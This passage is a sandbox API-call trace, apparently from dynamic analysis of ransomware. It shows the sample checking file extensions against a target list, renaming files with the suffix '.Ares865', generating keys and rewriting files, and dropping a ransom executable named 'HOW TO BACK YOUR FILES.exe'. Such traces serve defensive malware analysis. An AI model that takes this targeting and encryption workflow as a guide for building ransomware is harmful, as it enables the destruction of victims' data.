[0083.306] lstrcmpiW (lpString1="log", lpString2="fp4") returned 1 [0083.306] lstrlenW (lpString="fp5") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="fp5") returned 1 [0083.306] lstrlenW (lpString="fp7") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="fp7") returned 1 [0083.306] lstrlenW (lpString="fpt") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="fpt") returned 1 [0083.306] lstrlenW (lpString="frm") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="frm") returned 1 [0083.306] lstrlenW (lpString="gdb") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0083.306] lstrlenW (lpString="gdb") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="gdb") returned 1 [0083.306] lstrlenW (lpString="grdb") returned 4 [0083.306] lstrcmpiW (lpString1=".log", lpString2="grdb") returned -1 [0083.306] lstrlenW (lpString="gwi") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="gwi") returned 1 [0083.306] lstrlenW (lpString="hdb") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="hdb") returned 1 [0083.306] lstrlenW (lpString="his") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="his") returned 1 [0083.306] lstrlenW (lpString="ib") returned 2 [0083.306] lstrcmpiW (lpString1="og", lpString2="ib") returned 1 [0083.306] lstrlenW (lpString="idb") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="idb") returned 1 [0083.306] lstrlenW (lpString="ihx") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="ihx") returned 1 [0083.306] lstrlenW (lpString="itdb") returned 4 [0083.306] lstrcmpiW (lpString1=".log", lpString2="itdb") returned -1 [0083.306] lstrlenW (lpString="itw") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="itw") returned 1 [0083.306] lstrlenW (lpString="jet") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="jet") returned 1 [0083.306] lstrlenW (lpString="jtx") returned 3 [0083.306] lstrcmpiW (lpString1="log", lpString2="jtx") returned 1 [0083.307] lstrlenW (lpString="kdb") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="kdb") returned 1 [0083.307] lstrlenW (lpString="kexi") returned 4 [0083.307] lstrcmpiW (lpString1=".log", lpString2="kexi") returned -1 [0083.307] lstrlenW (lpString="kexic") returned 5 [0083.307] lstrcmpiW (lpString1="l.log", lpString2="kexic") returned 1 [0083.307] lstrlenW (lpString="kexis") returned 5 [0083.307] lstrcmpiW (lpString1="l.log", lpString2="kexis") returned 1 [0083.307] lstrlenW (lpString="lgc") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="lgc") returned 1 [0083.307] lstrlenW (lpString="lwx") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="lwx") returned -1 [0083.307] lstrlenW (lpString="maf") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="maf") returned -1 [0083.307] lstrlenW (lpString="maq") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="maq") returned -1 [0083.307] lstrlenW (lpString="mar") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mar") returned -1 [0083.307] lstrlenW (lpString="marshal") returned 7 [0083.307] lstrcmpiW (lpString1="all.log", lpString2="marshal") returned -1 [0083.307] lstrlenW (lpString="mas") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mas") returned -1 [0083.307] lstrlenW (lpString="mav") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mav") returned -1 [0083.307] lstrlenW (lpString="maw") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="maw") returned -1 [0083.307] lstrlenW (lpString="mdbhtml") returned 7 [0083.307] lstrcmpiW (lpString1="all.log", lpString2="mdbhtml") returned -1 [0083.307] lstrlenW (lpString="mdn") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mdn") returned -1 [0083.307] lstrlenW (lpString="mdt") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mdt") returned -1 [0083.307] lstrlenW (lpString="mfd") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mfd") returned -1 [0083.307] lstrlenW (lpString="mpd") returned 3 [0083.307] lstrcmpiW (lpString1="log", lpString2="mpd") returned -1 [0083.308] lstrlenW (lpString="mrg") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="mrg") returned -1 [0083.308] lstrlenW (lpString="mud") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="mud") returned -1 [0083.308] lstrlenW (lpString="mwb") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="mwb") returned -1 [0083.308] lstrlenW (lpString="myd") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="myd") returned -1 [0083.308] lstrlenW (lpString="ndf") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="ndf") returned -1 [0083.308] lstrlenW (lpString="nnt") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="nnt") returned -1 [0083.308] lstrlenW (lpString="nrmlib") returned 6 [0083.308] lstrcmpiW (lpString1="ll.log", lpString2="nrmlib") returned -1 [0083.308] lstrlenW (lpString="ns2") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="ns2") returned -1 [0083.308] lstrlenW (lpString="ns3") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="ns3") returned -1 [0083.308] lstrlenW (lpString="ns4") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="ns4") returned -1 [0083.308] lstrlenW (lpString="nsf") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="nsf") returned -1 [0083.308] lstrlenW (lpString="nv") returned 2 [0083.308] lstrcmpiW (lpString1="og", lpString2="nv") returned 1 [0083.308] lstrlenW (lpString="nv2") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="nv2") returned -1 [0083.308] lstrlenW (lpString="nwdb") returned 4 [0083.308] lstrcmpiW (lpString1=".log", lpString2="nwdb") returned -1 [0083.308] lstrlenW (lpString="nyf") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="nyf") returned -1 [0083.308] lstrlenW (lpString="odb") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0083.308] lstrlenW (lpString="odb") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="odb") returned -1 [0083.308] lstrlenW (lpString="oqy") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="oqy") returned -1 [0083.308] lstrlenW (lpString="ora") returned 3 [0083.308] lstrcmpiW (lpString1="log", lpString2="ora") returned -1 [0083.308] lstrlenW (lpString="orx") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="orx") returned -1 [0083.309] lstrlenW (lpString="owc") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="owc") returned -1 [0083.309] lstrlenW (lpString="p96") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="p96") returned -1 [0083.309] lstrlenW (lpString="p97") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="p97") returned -1 [0083.309] lstrlenW (lpString="pan") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="pan") returned -1 [0083.309] lstrlenW (lpString="pdb") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="pdb") returned -1 [0083.309] lstrlenW (lpString="pdm") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="pdm") returned -1 [0083.309] lstrlenW (lpString="pnz") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="pnz") returned -1 [0083.309] lstrlenW (lpString="qry") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="qry") returned -1 [0083.309] lstrlenW (lpString="qvd") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="qvd") returned -1 [0083.309] lstrlenW (lpString="rbf") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="rbf") returned -1 [0083.309] lstrlenW (lpString="rctd") returned 4 [0083.309] lstrcmpiW (lpString1=".log", lpString2="rctd") returned -1 [0083.309] lstrlenW (lpString="rod") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="rod") returned -1 [0083.309] lstrlenW (lpString="rodx") returned 4 [0083.309] lstrcmpiW (lpString1=".log", lpString2="rodx") returned -1 [0083.309] lstrlenW (lpString="rpd") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="rpd") returned -1 [0083.309] lstrlenW (lpString="rsd") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="rsd") returned -1 [0083.309] lstrlenW (lpString="sas7bdat") returned 8 [0083.309] lstrcmpiW (lpString1="tall.log", lpString2="sas7bdat") returned 1 [0083.309] lstrlenW (lpString="sbf") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="sbf") returned -1 [0083.309] lstrlenW (lpString="scx") returned 3 [0083.309] lstrcmpiW (lpString1="log", lpString2="scx") returned -1 [0083.309] lstrlenW (lpString="sdb") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="sdb") returned -1 [0083.310] lstrlenW (lpString="sdc") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="sdc") returned -1 [0083.310] lstrlenW (lpString="sdf") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="sdf") returned -1 [0083.310] lstrlenW (lpString="sis") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="sis") returned -1 [0083.310] lstrlenW (lpString="spq") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="spq") returned -1 [0083.310] lstrlenW (lpString="te") returned 2 [0083.310] lstrcmpiW (lpString1="og", lpString2="te") returned -1 [0083.310] lstrlenW (lpString="teacher") returned 7 [0083.310] lstrcmpiW (lpString1="all.log", lpString2="teacher") returned -1 [0083.310] lstrlenW (lpString="tmd") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="tmd") returned -1 [0083.310] lstrlenW (lpString="tps") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="tps") returned -1 [0083.310] lstrlenW (lpString="trc") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0083.310] lstrlenW (lpString="trc") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="trc") returned -1 [0083.310] lstrlenW (lpString="trm") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="trm") returned -1 [0083.310] lstrlenW (lpString="udb") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="udb") returned -1 [0083.310] lstrlenW (lpString="udl") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="udl") returned -1 [0083.310] lstrlenW (lpString="usr") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="usr") returned -1 [0083.310] lstrlenW (lpString="v12") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="v12") returned -1 [0083.310] lstrlenW (lpString="vis") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="vis") returned -1 [0083.310] lstrlenW (lpString="vpd") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="vpd") returned -1 [0083.310] lstrlenW (lpString="vvv") returned 3 [0083.310] lstrcmpiW (lpString1="log", lpString2="vvv") returned -1 [0083.310] lstrlenW (lpString="wdb") returned 3 [0083.311] lstrcmpiW (lpString1="log", lpString2="wdb") returned -1 [0083.311] lstrlenW (lpString="wmdb") returned 4 [0083.311] lstrcmpiW (lpString1=".log", lpString2="wmdb") returned -1 [0083.311] lstrlenW (lpString="wrk") returned 3 [0083.311] lstrcmpiW (lpString1="log", lpString2="wrk") returned -1 [0083.311] lstrlenW (lpString="xdb") returned 3 [0083.311] lstrcmpiW (lpString1="log", lpString2="xdb") returned -1 [0083.311] lstrlenW (lpString="xld") returned 3 [0083.311] lstrcmpiW (lpString1="log", lpString2="xld") returned -1 [0083.311] lstrlenW (lpString="xmlff") returned 5 [0083.311] lstrcmpiW (lpString1="l.log", lpString2="xmlff") returned -1 [0083.311] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.Ares865") returned 70 [0083.311] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log"), lpNewFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.Ares865" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.ares865"), dwFlags=0x1) returned 1 [0083.313] CreateFileW (lpFileName="C:\\Users\\All Users\\Mozilla\\logs\\maintenanceservice-install.log.Ares865" (normalized: "c:\\users\\all users\\mozilla\\logs\\maintenanceservice-install.log.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0083.313] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=164) returned 1 [0083.313] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0083.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0083.314] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f00d8 [0083.314] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0083.314] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0083.314] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.315] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x15c [0083.322] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0083.323] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0083.324] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0083.324] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0083.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0083.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0083.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0083.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0083.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0083.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0083.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0083.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0083.324] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0083.324] CloseHandle (hObject=0x15c) returned 1 [0083.324] CloseHandle (hObject=0x118) returned 1 [0083.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0083.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f00d8 | out: hHeap=0x2b0000) returned 1 [0083.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0083.325] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaf8556a0, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb07822e0, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0xa4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="maintenanceservice-install.log", cAlternateFileName="MAINTE~1.LOG")) returned 0 [0083.325] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.325] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7af0 [0083.325] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft Help", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft Help") returned="C:\\Users\\All Users\\Microsoft Help" [0083.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ee9c0 | out: hHeap=0x2b0000) returned 1 [0083.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7ae8 | out: hHeap=0x2b0000) returned 1 [0083.325] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help") returned 33 [0083.325] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft Help" | out: lpString1="C:\\Users\\All Users\\Microsoft Help") returned="C:\\Users\\All Users\\Microsoft Help" [0083.325] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.325] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft Help\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft help\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.326] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.326] GetLastError () returned 0x0 [0083.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.326] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.326] CloseHandle (hObject=0x120) returned 1 [0083.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.326] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.326] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft Help\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.326] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.326] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.326] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.326] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe79db030, ftCreationTime.dwHighDateTime=0x1d2dda1, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c315d80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.327] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.327] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.327] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.327] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.327] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c315d80, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c315d80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.327] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.327] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x896b9210, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x896b9210, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xe8b8c220, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x186, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Hx.hxn", cAlternateFileName="")) returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="aoldtz.exe") returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2=".") returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="..") returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="windows") returned -1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="bootmgr") returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="temp") returned -1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="pagefile.sys") returned -1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="boot") returned 1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="ids.txt") returned -1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="ntuser.dat") returned -1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="perflogs") returned -1 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2="MSBuild") returned -1 [0083.327] lstrlenW (lpString="Hx.hxn") returned 6 [0083.327] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft Help\\*") returned 35 [0083.327] lstrcpyW (in: lpString1=0x2cce444, lpString2="Hx.hxn" | out: lpString1="Hx.hxn") returned="Hx.hxn" [0083.327] lstrlenW (lpString="Hx.hxn") returned 6 [0083.327] lstrlenW (lpString="Ares865") returned 7 [0083.327] lstrlenW (lpString=".dll") returned 4 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2=".dll") returned 1 [0083.327] lstrlenW (lpString=".lnk") returned 4 [0083.327] lstrcmpiW (lpString1="Hx.hxn", lpString2=".lnk") returned 1 [0083.328] lstrlenW (lpString=".ini") returned 4 [0083.328] lstrcmpiW (lpString1="Hx.hxn", lpString2=".ini") returned 1 [0083.328] lstrlenW (lpString=".sys") returned 4 [0083.328] lstrcmpiW (lpString1="Hx.hxn", lpString2=".sys") returned 1 [0083.328] lstrlenW (lpString="Hx.hxn") returned 6 [0083.328] lstrlenW (lpString="bak") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="bak") returned 1 [0083.328] lstrlenW (lpString="ba_") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="ba_") returned 1 [0083.328] lstrlenW (lpString="dbb") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="dbb") returned 1 [0083.328] lstrlenW (lpString="vmdk") returned 4 [0083.328] lstrcmpiW (lpString1=".hxn", lpString2="vmdk") returned -1 [0083.328] lstrlenW (lpString="rar") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="rar") returned -1 [0083.328] lstrlenW (lpString="zip") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="zip") returned -1 [0083.328] lstrlenW (lpString="tgz") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="tgz") returned -1 [0083.328] lstrlenW (lpString="vbox") returned 4 [0083.328] lstrcmpiW (lpString1=".hxn", lpString2="vbox") returned -1 [0083.328] lstrlenW (lpString="vdi") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="vdi") returned -1 [0083.328] lstrlenW (lpString="vhd") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="vhd") returned -1 [0083.328] lstrlenW (lpString="vhdx") returned 4 [0083.328] lstrcmpiW (lpString1=".hxn", lpString2="vhdx") returned -1 [0083.328] lstrlenW (lpString="avhd") returned 4 [0083.328] lstrcmpiW (lpString1=".hxn", lpString2="avhd") returned -1 [0083.328] lstrlenW (lpString="db") returned 2 [0083.328] lstrcmpiW (lpString1="xn", lpString2="db") returned 1 [0083.328] lstrlenW (lpString="db2") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="db2") returned 1 [0083.328] lstrlenW (lpString="db3") returned 3 [0083.328] lstrcmpiW (lpString1="hxn", lpString2="db3") returned 1 [0083.328] lstrlenW (lpString="dbf") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="dbf") returned 1 [0083.329] lstrlenW (lpString="mdf") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="mdf") returned -1 [0083.329] lstrlenW (lpString="mdb") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="mdb") returned -1 [0083.329] lstrlenW (lpString="sql") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="sql") returned -1 [0083.329] lstrlenW (lpString="sqlite") returned 6 [0083.329] lstrlenW (lpString="sqlite3") returned 7 [0083.329] lstrlenW (lpString="sqlitedb") returned 8 [0083.329] lstrlenW (lpString="xml") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="xml") returned -1 [0083.329] lstrlenW (lpString="$er") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="$er") returned 1 [0083.329] lstrlenW (lpString="4dd") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="4dd") returned 1 [0083.329] lstrlenW (lpString="4dl") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="4dl") returned 1 [0083.329] lstrlenW (lpString="^^^") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="^^^") returned 1 [0083.329] lstrlenW (lpString="abs") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="abs") returned 1 [0083.329] lstrlenW (lpString="abx") returned 3 [0083.329] lstrcmpiW (lpString1="hxn", lpString2="abx") returned 1 [0083.329] lstrlenW (lpString="accdb") returned 5 [0083.329] lstrcmpiW (lpString1="x.hxn", lpString2="accdb") returned 1 [0083.329] lstrlenW (lpString="accdc") returned 5 [0083.329] lstrcmpiW (lpString1="x.hxn", lpString2="accdc") returned 1 [0083.329] lstrlenW (lpString="accde") returned 5 [0083.329] lstrcmpiW (lpString1="x.hxn", lpString2="accde") returned 1 [0083.329] lstrlenW (lpString="accdr") returned 5 [0083.329] lstrcmpiW (lpString1="x.hxn", lpString2="accdr") returned 1 [0083.329] lstrlenW (lpString="accdt") returned 5 [0083.329] lstrcmpiW (lpString1="x.hxn", lpString2="accdt") returned 1 [0083.330] lstrlenW (lpString="accdw") returned 5 [0083.330] lstrcmpiW (lpString1="x.hxn", lpString2="accdw") returned 1 [0083.330] lstrlenW (lpString="accft") returned 5 [0083.330] lstrcmpiW (lpString1="x.hxn", lpString2="accft") returned 1 [0083.330] lstrlenW 